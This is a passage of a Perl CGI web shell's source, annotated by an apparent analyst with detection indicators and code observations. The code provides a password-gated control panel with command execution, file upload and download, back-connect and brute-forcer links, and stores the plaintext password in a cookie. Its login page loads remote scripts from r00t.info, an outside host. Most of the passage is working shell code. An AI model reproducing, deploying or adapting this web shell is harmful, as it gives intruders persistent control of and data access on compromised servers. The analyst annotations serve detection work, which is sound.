  2824.         $Header =~ /filename=\"(.+)\"/;
  2825.         $in{'f'} = $1;
  2826.         $in{'f'} =~ s/\"//g;
  2827.         $in{'f'} =~ s/\s//g;
  2828.  
  2829.         # parse trailer
                # Remaining parts are ordinary fields. The loop starts at index 2
                # and stops at the first part that evaluates false. The field
                # name is the first double-quoted word; the value is the text
                # after it, stripped of the leading blank line and the trailing
                # line end, then %XX-decoded.
  2830.         for($i=2; $list[$i]; $i++)
  2831.         {
  2832.             $list[$i] =~ s/^.+name=$//;
  2833.             $list[$i] =~ /\"(\w+)\"/;
  2834.             $key = $1;
  2835.             $val = $';
  2836.             $val =~ s/(^(\r\n\r\n|\n\n))|(\r\n$|\n$)//g;
  2837.             $val =~ s/%(..)/pack("c", hex($1))/ge;
  2838.             $in{$key} = $val;
  2839.         }
  2840.     }
  2841.     else # standard post data (url encoded, not multipart)
  2842.     {
                # Split on &, turn + into a space, split each pair on the first =,
                # then %XX-decode key and value. Values of a repeated key are
                # joined with a NUL byte.
  2843.         @in = split(/&/, $in);
  2844.         foreach $i (0 .. $#in)
  2845.         {
  2846.             $in[$i] =~ s/\+/ /g;
  2847.             ($key, $val) = split(/=/, $in[$i], 2);
  2848.             $key =~ s/%(..)/pack("c", hex($1))/ge;
  2849.             $val =~ s/%(..)/pack("c", hex($1))/ge;
  2850.             $in{$key} .= "\0" if (defined($in{$key}));
  2851.             $in{$key} .= $val;
  2852.         }
  2853.     }
  2854. }
  2855.  
  2856. #------------------------------------------------------------------------------
  2857. # Prints the HTML Page Header
  2858. # Argument 1: Form item name to which focus should be set
  2859. #------------------------------------------------------------------------------
  2860. sub PrintPageHeader
  2861. {
  2862.     $EncodedCurrentDir = $CurrentDir;
  2863.     $EncodedCurrentDir =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
  2864.     my $dir =$CurrentDir;
  2865.     $dir=~ s/\\/\\\\/g;
  2866.     print "Content-type: text/html\n\n";
  2867.     print <<END;
  2868. <html>
  2869. <head>
  2870. <meta hxxp-equiv="content-type" content="text/html; charset=UTF-8">
  2871. <title>  </title>
  2872.  
  2873. $HtmlMetaHeader
  2874.  
  2875. </head>
  2876. <style>
  2877. body{
  2878. font: 10pt Verdana;
  2879. }
  2880. tr {
  2881. BORDER-RIGHT:  #3e3e3e 1px solid;
  2882. BORDER-TOP:    #3e3e3e 1px solid;
  2883. BORDER-LEFT:   #3e3e3e 1px solid;
  2884. BORDER-BOTTOM: #3e3e3e 1px solid;
  2885. color: #ff9900;
  2886. }
  2887. td {
  2888. BORDER-RIGHT:  #3e3e3e 1px solid;
  2889. BORDER-TOP:    #3e3e3e 1px solid;
  2890. BORDER-LEFT:   #3e3e3e 1px solid;
  2891. BORDER-BOTTOM: #3e3e3e 1px solid;
  2892. color: #2BA8EC;
  2893. font: 10pt Verdana;
  2894. }
  2895.  
  2896. table {
  2897. BORDER-RIGHT:  #3e3e3e 1px solid;
  2898. BORDER-TOP:    #3e3e3e 1px solid;
  2899. BORDER-LEFT:   #3e3e3e 1px solid;
  2900. BORDER-BOTTOM: #3e3e3e 1px solid;
  2901. BACKGROUND-COLOR: #111;
  2902. }
  2903.  
  2904.  
  2905. input {
  2906. BORDER-RIGHT:  #3e3e3e 1px solid;
  2907. BORDER-TOP:    #3e3e3e 1px solid;
  2908. BORDER-LEFT:   #3e3e3e 1px solid;
  2909. BORDER-BOTTOM: #3e3e3e 1px solid;
  2910. BACKGROUND-COLOR: Black;
  2911. font: 10pt Verdana;
  2912. color: #ff9900;
  2913. }
  2914.  
  2915. input.submit {
  2916. text-shadow: 0pt 0pt 0.3em cyan, 0pt 0pt 0.3em cyan;
  2917. color: #FFFFFF;
  2918. border-color: #009900;
  2919. }
  2920.  
  2921. code {
  2922. border          : dashed 0px #333;
  2923. BACKGROUND-COLOR: Black;
  2924. font: 10pt Verdana bold;
  2925. color: while;
  2926. }
  2927.  
  2928. run {
  2929. border          : dashed 0px #333;
  2930. font: 10pt Verdana bold;
  2931. color: #FF00AA;
  2932. }
  2933.  
  2934. textarea {
  2935. BORDER-RIGHT:  #3e3e3e 1px solid;
  2936. BORDER-TOP:    #3e3e3e 1px solid;
  2937. BORDER-LEFT:   #3e3e3e 1px solid;
  2938. BORDER-BOTTOM: #3e3e3e 1px solid;
  2939. BACKGROUND-COLOR: #1b1b1b;
  2940. font: Fixedsys bold;
  2941. color: #aaa;
  2942. }
  2943. A:link {
  2944.     COLOR: #2BA8EC; TEXT-DECORATION: none
  2945. }
  2946. A:visited {
  2947.     COLOR: #2BA8EC; TEXT-DECORATION: none
  2948. }
  2949. A:hover {
  2950.     text-shadow: 0pt 0pt 0.3em cyan, 0pt 0pt 0.3em cyan;
  2951.     color: #ff9900; TEXT-DECORATION: none
  2952. }
  2953. A:active {
  2954.     color: Red; TEXT-DECORATION: none
  2955. }
  2956.  
  2957. .listdir tr:hover{
  2958.     background: #444;
  2959. }
  2960. .listdir tr:hover td{
  2961.     background: #444;
  2962.     text-shadow: 0pt 0pt 0.3em cyan, 0pt 0pt 0.3em cyan;
  2963.     color: #FFFFFF; TEXT-DECORATION: none;
  2964. }
  2965. .notline{
  2966.     background: #111;
  2967. }
  2968. .line{
  2969.     background: #222;
  2970. }
  2971. </style>
  2972. <script language="javascript">
  2973. function chmod_form(i,file)
  2974. {
  2975.     /*var ajax='ajax_PostData("FormPerms_'+i+'","$ScriptLocation","ResponseData"); return false;';*/
  2976.     var ajax="";
  2977.     document.getElementById("FilePerms_"+i).innerHTML="<form name=FormPerms_" + i+ " action='' method='POST'><input id=text_" + i + "  name=chmod type=text size=5 /><input type=submit class='submit' onclick='" + ajax + "' value=OK><input type=hidden name=a value='gui'><input type=hidden name=d value='$dir'><input type=hidden name=f value='"+file+"'></form>";
  2978.     document.getElementById("text_" + i).focus();
  2979. }
  2980. function rm_chmod_form(response,i,perms,file)
  2981. {
  2982.     response.innerHTML = "<span onclick=\\\"chmod_form(" + i + ",'"+ file+ "')\\\" >"+ perms +"</span></td>";
  2983. }
  2984. function rename_form(i,file,f)
  2985. {
  2986.     var ajax="";
  2987.     f.replace(/\\\\/g,"\\\\\\\\");
  2988.     var back="rm_rename_form("+i+",\\\""+file+"\\\",\\\""+f+"\\\"); return false;";
  2989.     document.getElementById("File_"+i).innerHTML="<form name=FormPerms_" + i+ " action='' method='POST'><input id=text_" + i + "  name=rename type=text value= '"+file+"' /><input type=submit class='submit' onclick='" + ajax + "' value=OK><input type=submit class='submit' onclick='" + back + "' value=Cancel><input type=hidden name=a value='gui'><input type=hidden name=d value='$dir'><input type=hidden name=f value='"+file+"'></form>";
  2990.     document.getElementById("text_" + i).focus();
  2991. }
  2992. function rm_rename_form(i,file,f)
  2993. {
  2994.     if(f=='f')
  2995.     {
  2996.         document.getElementById("File_"+i).innerHTML="<a href='?a=command&d=$dir&c=edit%20"+file+"%20'>" +file+ "</a>";
  2997.     }else
  2998.     {
  2999.         document.getElementById("File_"+i).innerHTML="<a href='?a=gui&d="+f+"'>[ " +file+ " ]</a>";
  3000.     }
  3001. }
  3002. </script>
  3003. <body onLoad="document.f.@_.focus()" bgcolor="#0c0c0c" topmargin="0" leftmargin="0" marginwidth="0" marginheight="0">
  3004. <center><code>
  3005. <table border="1" width="100%" cellspacing="0" cellpadding="2">
  3006. <tr>
  3007.     <td align="center" rowspan=2>
  3008.         <b><font size="5">$EditPersion</font></b>
  3009.     </td>
  3010.  
  3011.     <td>
  3012.  
  3013.         <font face="Verdana" size="2">$ENV{"SERVER_SOFTWARE"}</font>
  3014.     </td>
  3015.     <td>Server IP:<font color="#cc0000"> $ENV{'SERVER_ADDR'}</font> | Your IP: <font color="#000000">$ENV{'REMOTE_ADDR'}</font>
  3016.     </td>
  3017.  
  3018. </tr>
  3019.  
  3020. <tr>
  3021. <td colspan="3"><font face="Verdana" size="2">
  3022. <a href="$ScriptLocation">Home</a> |
  3023. <a href="$ScriptLocation?a=command&d=$EncodedCurrentDir">Komut</a> |
  3024. <a href="$ScriptLocation?a=gui&d=$EncodedCurrentDir">Dizin</a> |
  3025. <a href="$ScriptLocation?a=upload&d=$EncodedCurrentDir">Upload File</a> |
  3026. <a href="$ScriptLocation?a=download&d=$EncodedCurrentDir">Download File</a> |
  3027.  
  3028. <a href="$ScriptLocation?a=backbind">Back Connet</a> |
  3029. <a href="$ScriptLocation?a=bruteforcer">Brute Forcer</a> |
  3030. <a href="$ScriptLocation?a=checklog">Check Log</a> |
  3031. <a href="$ScriptLocation?a=domainsuser">Domains/Users</a> |
  3032. <a href="$ScriptLocation?a=logout">Logout</a> |
  3033. <a target='_blank' href="#">Help</a>
  3034.  
  3035. </font></td>
  3036. </tr>
  3037. </table>
  3038. <font id="ResponseData" color="#ff99cc" >
  3039. END
  3040. }
  3041.  
  3042. #------------------------------------------------------------------------------
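  3043. # Prints the login screen: a typing-text animation over a fake connection log.
        # The markup also loads two scripts (bot/log.js and ccb.js) from r00t.info and
        # a background image from dl.dropbox.com, so the browser of anyone who opens
        # the page contacts those hosts. The hxxp scheme shown on this page appears to
        # be defanging applied to the paste.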
  3044. #------------------------------------------------------------------------------
  3045. sub PrintLoginScreen
  3046. {
  3047.  
  3048.     print <<END;
  3049. <pre><script type="text/javascript">
  3050. TypingText = function(element, interval, cursor, finishedCallback) {
  3051.   if((typeof document.getElementById == "undefined") || (typeof element.innerHTML == "undefined")) {
  3052.     this.running = true;    // Never run.
  3053.     return;
  3054.   }
  3055.   this.element = element;
  3056.   this.finishedCallback = (finishedCallback ? finishedCallback : function() { return; });
  3057.   this.interval = (typeof interval == "undefined" ? 100 : interval);
  3058.   this.origText = this.element.innerHTML;
  3059.   this.unparsedOrigText = this.origText;
  3060.   this.cursor = (cursor ? cursor : "");
  3061.   this.currentText = "";
  3062.   this.currentChar = 0;
  3063.   this.element.typingText = this;
  3064.   if(this.element.id == "") this.element.id = "typingtext" + TypingText.currentIndex++;
  3065.   TypingText.all.push(this);
  3066.   this.running = false;
  3067.   this.inTag = false;
  3068.   this.tagBuffer = "";
  3069.   this.inHTMLEntity = false;
  3070.   this.HTMLEntityBuffer = "";
  3071. }
  3072. TypingText.all = new Array();
  3073. TypingText.currentIndex = 0;
  3074. TypingText.runAll = function() {
  3075.   for(var i = 0; i < TypingText.all.length; i++) TypingText.all[i].run();
  3076. }
  3077. TypingText.prototype.run = function() {
  3078.   if(this.running) return;
  3079.   if(typeof this.origText == "undefined") {
  3080.     setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval);   // We haven't finished loading yet.  Have patience.
  3081.     return;
  3082.   }
  3083.   if(this.currentText == "") this.element.innerHTML = "";
  3084. //  this.origText = this.origText.replace(/<([^<])*>/, "");     // Strip HTML from text.
  3085.   if(this.currentChar < this.origText.length) {
  3086.     if(this.origText.charAt(this.currentChar) == "<" && !this.inTag) {
  3087.       this.tagBuffer = "<";
  3088.       this.inTag = true;
  3089.       this.currentChar++;
  3090.       this.run();
  3091.       return;
  3092.     } else if(this.origText.charAt(this.currentChar) == ">" && this.inTag) {
  3093.       this.tagBuffer += ">";
  3094.       this.inTag = false;
  3095.       this.currentText += this.tagBuffer;
  3096.       this.currentChar++;
  3097.       this.run();
  3098.       return;
  3099.     } else if(this.inTag) {
  3100.       this.tagBuffer += this.origText.charAt(this.currentChar);
  3101.       this.currentChar++;
  3102.       this.run();
  3103.       return;
  3104.     } else if(this.origText.charAt(this.currentChar) == "&" && !this.inHTMLEntity) {
  3105.       this.HTMLEntityBuffer = "&";
  3106.       this.inHTMLEntity = true;
  3107.       this.currentChar++;
  3108.       this.run();
  3109.       return;
  3110.     } else if(this.origText.charAt(this.currentChar) == ";" && this.inHTMLEntity) {
  3111.       this.HTMLEntityBuffer += ";";
  3112.       this.inHTMLEntity = false;
  3113.       this.currentText += this.HTMLEntityBuffer;
  3114.       this.currentChar++;
  3115.       this.run();
  3116.       return;
  3117.     } else if(this.inHTMLEntity) {
  3118.       this.HTMLEntityBuffer += this.origText.charAt(this.currentChar);
  3119.       this.currentChar++;
  3120.       this.run();
  3121.       return;
  3122.     } else {
  3123.       this.currentText += this.origText.charAt(this.currentChar);
  3124.     }
  3125.     this.element.innerHTML = this.currentText;
  3126.     this.element.innerHTML += (this.currentChar < this.origText.length - 1 ? (typeof this.cursor == "function" ? this.cursor(this.currentText) : this.cursor) : "");
  3127.     this.currentChar++;
  3128.     setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval);
  3129.   } else {
  3130.     this.currentText = "";
  3131.     this.currentChar = 0;
  3132.         this.running = false;
  3133.         this.finishedCallback();
  3134.   }
  3135. }
  3136. </script>
  3137. </pre>
  3138.  
  3139. <font style="font: 15pt Verdana; color: yellow;">Copyright (C) 2001 r00t.info </font><br><br>
  3140. <table align="center" border="1" width="600" heigh>
  3141. <script src=hxxp://r00t.info/bot/log.js></script>
  3142. <script src=hxxp://r00t.info/ccb.js></script>
  3143. <tbody><tr>
  3144. <td valign="top" background="hxxp://dl.dropbox.com/u/10860051/images/matran.gif"><p id="hack" style="margin-left: 3px;">
  3145. <font color="#009900"> Please Wait . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .</font> <br>
  3146.  
  3147. <font color="#009900"> Trying connect to Server . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .</font><br>
  3148. <font color="#F00000"><font color="#FFF000">~\$</font> Connected ! </font><br>
  3149. <font color="#009900"><font color="#FFF000">$ServerName~</font> Checking Server . . . . . . . . . . . . . . . . . . .</font> <br>
  3150.  
  3151. <font color="#009900"><font color="#FFF000">$ServerName~</font> Trying connect to Command . . . . . . . . . . .</font><br>
  3152.  
  3153. <font color="#F00000"><font color="#FFF000">$ServerName~</font>\$ Connected Command! </font><br>
  3154. <font color="#009900"><font color="#FFF000">$ServerName~<font color="#F00000">\$</font></font> OK! You can kill it!</font>
  3155. </tr>
  3156. </tbody></table>
  3157. <br>
  3158.  
  3159. <script type="text/javascript">
  3160. new TypingText(document.getElementById("hack"), 30, function(i){ var ar = new Array("_",""); return " " + ar[i.length % ar.length]; });
  3161. TypingText.runAll();
  3162.  
  3163. </script>
  3164. END
  3165. }
  3166.  
  3167. #------------------------------------------------------------------------------
  3168. # Add html special chars
  3169. #------------------------------------------------------------------------------
  3170. sub HtmlSpecialChars($){
            # Returns a copy of the argument with the characters & " ' < > replaced
            # by HTML entities. The ampersand is handled first so that entities
            # produced by the later substitutions are not escaped a second time.
            # Analyst note: in this part of the file only RunCmd passes text through
            # this helper; the form builders interpolate $CurrentDir and file names
            # into HTML without calling it.
  3171.     my $text = shift;
  3172.     $text =~ s/&/&amp;/g;
  3173.     $text =~ s/"/&quot;/g;
  3174.     $text =~ s/'/&#039;/g;
  3175.     $text =~ s/</&lt;/g;
  3176.     $text =~ s/>/&gt;/g;
  3177.     return $text;
  3178. }
  3179. #------------------------------------------------------------------------------
  3180. # Add link for directory
  3181. #------------------------------------------------------------------------------
  3182. sub AddLinkDir($)
  3183. {
            # Builds a breadcrumb for $CurrentDir: one <a> element per path
            # component, each pointing at ?a=<action>&d=<path up to that component>.
            # Argument 1: the action name placed in the a= parameter; callers in this
            # part of the file pass "command", "download", "upload" and "gui".
            # Returns the concatenated HTML as a string.
  3184.     my $ac=shift;
  3185.     my @dir=();
            # Split on backslash when $WinNT is set, otherwise on "/".
            # &trim is defined outside this part of the file.
  3186.     if($WinNT)
  3187.     {
  3188.         @dir=split(/\\/,$CurrentDir);
  3189.     }else
  3190.     {
  3191.         @dir=split("/",&trim($CurrentDir));
  3192.     }
  3193.     my $path="";
  3194.     my $result="";
  3195.     foreach (@dir)
  3196.     {
                # $path accumulates the components seen so far. Neither $path nor
                # the component text is URL- or HTML-escaped before it is placed in
                # the href and the link body, so directory names reach the page
                # verbatim.
  3197.         $path .= $_.$PathSep;
  3198.         $result.="<a href='?a=".$ac."&d=".$path."'>".$_.$PathSep."</a>";
  3199.     }
  3200.     return $result;
  3201. }
  3202. #------------------------------------------------------------------------------
  3203. # Prints the message that informs the user of a failed login
  3204. #------------------------------------------------------------------------------
  3205. sub PrintLoginFailedMessage
  3206. {
            # Prints a fixed block of HTML. Nothing from the request is echoed, so
            # the text "Login incorrect" preceded by "Login : Administrator" is a
            # stable response string for this shell's failed-login page.
  3207.     print <<END;
  3208. <br>Login : Administrator<br>
  3209.  
  3210. Password:<br>
  3211. Login incorrect<br><br>
  3212. END
  3213. }
  3214.  
  3215. #------------------------------------------------------------------------------
  3216. # Prints the HTML form for logging in
  3217. #------------------------------------------------------------------------------
  3218. sub PrintLoginForm
  3219. {
            # Prints the login form. It POSTs to $ScriptLocation with the hidden
            # field a=login and the password in field p. The form is named "f",
            # the name the body onLoad handler in PrintPageHeader refers to.
            # A POST body carrying a=login together with p=... is therefore what a
            # login attempt against this shell looks like in captured traffic.
  3220.     print <<END;
  3221. <form name="f" method="POST" action="$ScriptLocation">
  3222. <input type="hidden" name="a" value="login">
  3223. Login : Administrator<br>
  3224. Password:<input type="password" name="p">
  3225. <input class="submit" type="submit" value="Enter">
  3226. </form>
  3227. END
  3228. }
  3229.  
  3230. #------------------------------------------------------------------------------
  3231. # Prints the footer for the HTML Page
  3232. #------------------------------------------------------------------------------
  3233. sub PrintPageFooter
  3234. {
            # Prints the footer banner with $EditPersion and closes the <code>,
            # <center>, <body> and <html> elements opened by PrintPageHeader.
            # The <font id="ResponseData"> element opened there is not closed here.
  3235.     print "<br><font color=red>o---[  <font color=#ff9900>Edit by $EditPersion </font>  ]---o</font></code></center></body></html>";
  3236. }
  3237.  
  3238. #------------------------------------------------------------------------------
  3239. # Retrieves the values of all cookies. The cookies can be accessed using the
  3240. # variable $Cookies{''}
  3241. #------------------------------------------------------------------------------
  3242. sub GetCookies
  3243. {
            # Splits the cookie header on "; " and stores each name/value pair in
            # the global %Cookies. @hxxpcookies, $cookie, $id and $val are globals
            # too (no "my").
            # NOTE(review): the key reads hxxp_COOKIE on this page; the CGI
            # variable is HTTP_COOKIE, so this is presumably the same http -> hxxp
            # defanging seen in the URLs of the paste. Confirm against a sample.
  3244.     @hxxpcookies = split(/; /,$ENV{'hxxp_COOKIE'});
  3245.     foreach $cookie(@hxxpcookies)
  3246.     {
                # split has no explicit limit and is assigned to two scalars, so a
                # value that itself contains "=" is cut at that character.
  3247.         ($id, $val) = split(/=/, $cookie);
  3248.         $Cookies{$id} = $val;
  3249.     }
  3250. }
  3251.  
  3252. #------------------------------------------------------------------------------
  3253. # Prints the screen when the user logs out
  3254. #------------------------------------------------------------------------------
  3255. sub PrintLogoutScreen
  3256. {
            # Prints one fixed line of text; no session or cookie state is touched
            # here (PerformLogout clears the cookie before calling this).
  3257.     print "Connection closed by foreign host.<br><br>";
  3258. }
  3259.  
  3260. #------------------------------------------------------------------------------
  3261. # Logs out the user and allows the user to login again
  3262. #------------------------------------------------------------------------------
  3263. sub PerformLogout
  3264. {
            # Blanks the SAVEDPWD cookie, then renders the logged-out page (header,
            # logout line, login screen, login form, footer) and ends the script.
            # The Set-Cookie line is printed first because PrintPageHeader emits
            # the Content-type line and the blank line that ends the HTTP headers.
            # No expiry attribute is sent, so the cookie is emptied, not deleted.
  3265.     print "Set-Cookie: SAVEDPWD=;\n"; # remove password cookie
  3266.     &PrintPageHeader("p");
  3267.     &PrintLogoutScreen;
  3268.  
  3269.     &PrintLoginScreen;
  3270.     &PrintLoginForm;
  3271.     &PrintPageFooter;
  3272.     exit;
  3273. }
  3274.  
  3275. #------------------------------------------------------------------------------
  3276. # This function is called to login the user. If the password matches, it
  3277. # displays a page that allows the user to run commands. If the password doesn't
  3278. # match or if no password is entered, it displays a form that allows the user
  3279. # to login
  3280. #------------------------------------------------------------------------------
  3281. sub PerformLogin
  3282. {
            # Compares the submitted password with the configured one using string
            # equality. $LoginPassword and $Password are both assigned outside this
            # part of the file.
  3283.     if($LoginPassword eq $Password) # password matched
  3284.     {
                # The password itself, not a session token, is written to the
                # SAVEDPWD cookie, so the browser sends it back in clear text with
                # later requests. Where Cookie headers are captured (proxy, WAF,
                # packet capture), the cookie name SAVEDPWD is an indicator and
                # its value is the operator's password.
  3285.         print "Set-Cookie: SAVEDPWD=$LoginPassword;\n";
  3286.         &PrintPageHeader;
                # ListDir is defined outside this part of the file.
  3287.         print &ListDir;
  3288.     }
  3289.     else # password didn't match
  3290.     {
                # Renders the login page again and exits; the failure message is
                # shown only when a non-empty password was submitted. No delay or
                # attempt counter is visible here.
  3291.         &PrintPageHeader("p");
  3292.         &PrintLoginScreen;
  3293.         if($LoginPassword ne "") # some password was entered
  3294.         {
  3295.             &PrintLoginFailedMessage;
  3296.  
  3297.         }
  3298.         &PrintLoginForm;
  3299.         &PrintPageFooter;
  3300.         exit;
  3301.     }
  3302. }
  3303.  
  3304. #------------------------------------------------------------------------------
  3305. # Prints the HTML form that allows the user to enter commands
  3306. #------------------------------------------------------------------------------
  3307. sub PrintCommandLineInputForm
  3308. {
            # Despite the name this sub prints nothing: it returns the HTML of the
            # command form as a string. The form POSTs a=command, the working
            # directory in d and the command text in c to $ScriptLocation.
            # $Prompt is a global and is overwritten on every call.
            # $CurrentDir is interpolated into the value attribute of field d
            # without HTML escaping.
  3309.     my $dir= "<span style='font: 11pt Verdana; font-weight: bold;'>".&AddLinkDir("command")."</span>";
  3310.     $Prompt = $WinNT ? "$dir > " : "<font color='#66ff66'>[admin\@$ServerName $dir]\$</font> ";
  3311.     return <<END;
  3312. <form name="f" method="POST" action="$ScriptLocation">
  3313.  
  3314. <input type="hidden" name="a" value="command">
  3315.  
  3316. <input type="hidden" name="d" value="$CurrentDir">
  3317. $Prompt
  3318. <input type="text" size="50" name="c">
  3319. <input class="submit"type="submit" value="Enter">
  3320. </form>
  3321. END
  3322. }
  3323.  
  3324. #------------------------------------------------------------------------------
  3325. # Prints the HTML form that allows the user to download files
  3326. #------------------------------------------------------------------------------
  3327. sub PrintFileDownloadForm
  3328. {
            # Returns (does not print) the HTML of the download form. The form
            # POSTs a=download, the working directory in d and the requested file
            # name in f to $ScriptLocation. $Prompt is a global overwritten here;
            # $CurrentDir is placed in the value attribute without HTML escaping.
  3329.     my $dir = &AddLinkDir("download");
  3330.     $Prompt = $WinNT ? "$dir > " : "[admin\@$ServerName $dir]\$ ";
  3331.     return <<END;
  3332. <form name="f" method="POST" action="$ScriptLocation">
  3333. <input type="hidden" name="d" value="$CurrentDir">
  3334. <input type="hidden" name="a" value="download">
  3335. $Prompt download<br><br>
  3336. Filename: <input class="file" type="text" name="f" size="35"><br><br>
  3337. Download: <input class="submit" type="submit" value="Begin">
  3338.  
  3339. </form>
  3340. END
  3341. }
  3342.  
  3343. #------------------------------------------------------------------------------
  3344. # Prints the HTML form that allows the user to upload files
  3345. #------------------------------------------------------------------------------
  3346. sub PrintFileUploadForm
  3347. {
            # Returns (does not print) the HTML of the upload form. It is a
            # multipart/form-data POST to $ScriptLocation with a=upload, the
            # working directory in d, the file in f and an optional o=overwrite
            # checkbox. $Prompt is a global overwritten here; $CurrentDir is placed
            # in the value attribute without HTML escaping.
  3348.     my $dir= &AddLinkDir("upload");
  3349.     $Prompt = $WinNT ? "$dir > " : "[admin\@$ServerName $dir]\$ ";
  3350.     return <<END;
  3351. <form name="f" enctype="multipart/form-data" method="POST" action="$ScriptLocation">
  3352. $Prompt upload<br><br>
  3353. Filename: <input class="file" type="file" name="f" size="35"><br><br>
  3354. Options: &nbsp;<input type="checkbox" name="o" id="up" value="overwrite">
  3355. <label for="up">Overwrite if it Exists</label><br><br>
  3356. Upload:&nbsp;&nbsp;&nbsp;<input class="submit" type="submit" value="Begin">
  3357. <input type="hidden" name="d" value="$CurrentDir">
  3358. <input class="submit" type="hidden" name="a" value="upload">
  3359.  
  3360. </form>
  3361.  
  3362. END
  3363. }
  3364.  
  3365. #------------------------------------------------------------------------------
  3366. # This function is called when the timeout for a command expires. We need to
  3367. # terminate the script immediately. This function is valid only on Unix. It is
  3368. # never called when the script is running on NT.
  3369. #------------------------------------------------------------------------------
  3370. sub CommandTimeout
  3371. {
            # Installed by RunCmd as the ALRM signal handler. On non-Windows hosts
            # it cancels any pending alarm and returns a block of HTML; when $WinNT
            # is set it does nothing.
            # NOTE(review): the HTML is returned, not printed, and Perl does not
            # use the return value of a signal handler. No exit or die appears in
            # this body either, so the immediate termination described in the
            # header comment is not implemented by the code as shown.
  3372.     if(!$WinNT)
  3373.     {
  3374.         alarm(0);
  3375.         return <<END;
  3376. </textarea>
  3377. <br><font color=yellow>
  3378. Command exceeded maximum time of $CommandTimeoutDuration second(s).</font>
  3379. <br><font size='6' color=red>Killed it!</font>
  3380. END
  3381.     }
  3382. }
  3383.  
  3384.  
  3385.  
  3386. #------------------------------------------------------------------------------
  3387. # This function displays the page that contains a link which allows the user
  3388. # to download the specified file. The page also contains a auto-refresh
  3389. # feature that starts the download automatically.
  3390. # Argument 1: Fully qualified filename of the file to be downloaded
  3391. #------------------------------------------------------------------------------
  3392. sub PrintDownloadLinkPage
  3393. {
            # Builds the page shown before a download starts.
            # Argument 1: path of the file to offer.
            # Returns the page body as a string; the page header is printed
            # directly by PrintPageHeader as a side effect when the file exists.
            # $FileUrl is a package global localised for the duration of the call.
  3394.     local($FileUrl) = @_;
  3395.     my $result="";
  3396.     if(-e $FileUrl) # if the file exists
  3397.     {
  3398.         # encode the file link so we can send it to the browser
                # Every character other than ASCII letters and digits is replaced
                # by % followed by its hex bytes.
  3399.         $FileUrl =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
                # The link repeats the request with o=go, which is the value that
                # makes BeginDownload/DownloadFile send the file contents. The
                # query string a=download&f=...&o=go is what the actual file
                # transfer looks like in request logs.
  3400.         $DownloadLink = "$ScriptLocation?a=download&f=$FileUrl&o=go";
                # $HtmlMetaHeader is interpolated into <head> by PrintPageHeader;
                # the refresh fires after one second.
  3401.         $HtmlMetaHeader = "<meta hxxp-EQUIV=\"Refresh\" CONTENT=\"1; URL=$DownloadLink\">";
  3402.         &PrintPageHeader("c");
                # $TransferFile is echoed into the page without HTML escaping.
  3403.         $result .= <<END;
  3404. Sending File $TransferFile...<br>
  3405.  
  3406. If the download does not start automatically,
  3407. <a href="$DownloadLink">Click Here</a>
  3408. END
  3409.         $result .= &PrintCommandLineInputForm;
  3410.     }
  3411.     else # file doesn't exist
  3412.     {
                # $! here is the error left by the failed -e test. The raw path is
                # echoed without HTML escaping.
  3413.         $result .= "Failed to download $FileUrl: $!";
  3414.         $result .= &PrintFileDownloadForm;
  3415.     }
  3416.     return $result;
  3417. }
  3418.  
  3419. #------------------------------------------------------------------------------
  3420. # This function reads the specified file from the disk and sends it to the
  3421. # browser, so that it can be downloaded by the user.
  3422. # Argument 1: Fully qualified pathname of the file to be sent.
  3423. #------------------------------------------------------------------------------
  3424. sub SendFileToBrowser
  3425. {
            # Streams a file from disk to the client as an attachment.
            # Argument 1: path of the file to send.
            # On success the script exits after sending; on failure an error line
            # plus the download form is returned as a string.
  3426.     my $result = "";
  3427.     local($SendFile) = @_;
            # Two-argument open on a bareword handle: the open mode is taken from
            # the string itself rather than being fixed to read-only. No path
            # restriction is applied, so anything the web server account can read
            # can be returned.
  3428.     if(open(SENDFILE, $SendFile)) # file opened for reading
  3429.     {
  3430.         if($WinNT)
  3431.         {
  3432.             binmode(SENDFILE);
  3433.             binmode(STDOUT);
  3434.         }
                # Element 7 of stat() is the size in bytes.
  3435.         $FileSize = (stat($SendFile))[7];
                # Copies the path into $Filename and captures the last path
                # component in $1. The character class also excludes a literal
                # caret, so a name containing ^ is cut at that character.
  3436.         ($Filename = $SendFile) =~  m!([^/^\\]*)$!;
                # Response signature: Content-Type application/x-unknown with an
                # unquoted Content-Disposition filename, returned by a CGI script.
  3437.         print "Content-Type: application/x-unknown\n";
  3438.         print "Content-Length: $FileSize\n";
  3439.         print "Content-Disposition: attachment; filename=$1\n\n";
  3440.         print while(<SENDFILE>);
  3441.         close(SENDFILE);
                # Exits with status 1 even though the transfer succeeded.
  3442.         exit(1);
  3443.     }
  3444.     else # failed to open file
  3445.     {
                # The path is echoed without HTML escaping.
  3446.         $result .= "Failed to download $SendFile: $!";
  3447.         $result .=&PrintFileDownloadForm;
  3448.     }
  3449.     return $result;
  3450. }
  3451.  
  3452.  
  3453. #------------------------------------------------------------------------------
  3454. # This function is called when the user downloads a file. It displays a message
  3455. # to the user and provides a link through which the file can be downloaded.
  3456. # This function is also called when the user clicks on that link. In this case,
  3457. # the file is read and sent to the browser.
  3458. #------------------------------------------------------------------------------
  3459. sub BeginDownload
  3460. {
            # Resolves $TransferFile to a full path in the global $TargetFile and
            # either sends the file (when $Options is "go") or builds the link
            # page. The same resolution logic is repeated in DownloadFile.
            # Absolute paths are accepted as given and relative ones are appended
            # to $CurrentDir with no normalisation, so no directory containment is
            # enforced.
  3461.     # get fully qualified path of the file to be downloaded
            # The condition combines its tests with the bitwise operators & and |
            # rather than && and ||, so both pattern matches are always evaluated.
  3462.     if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) |
  3463.         (!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
  3464.     {
  3465.         $TargetFile = $TransferFile;
  3466.     }
  3467.     else # path is relative
  3468.     {
                # Copies $CurrentDir into $TargetFile and removes one trailing
                # slash or backslash if present, then appends the file name.
  3469.         chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
  3470.         $TargetFile .= $PathSep.$TransferFile;
  3471.     }
  3472.  
  3473.     if($Options eq "go") # we have to send the file
  3474.     {
  3475.         &SendFileToBrowser($TargetFile);
  3476.     }
  3477.     else # we have to send only the link page
  3478.     {
  3479.         &PrintDownloadLinkPage($TargetFile);
  3480.     }
  3481. }
  3482.  
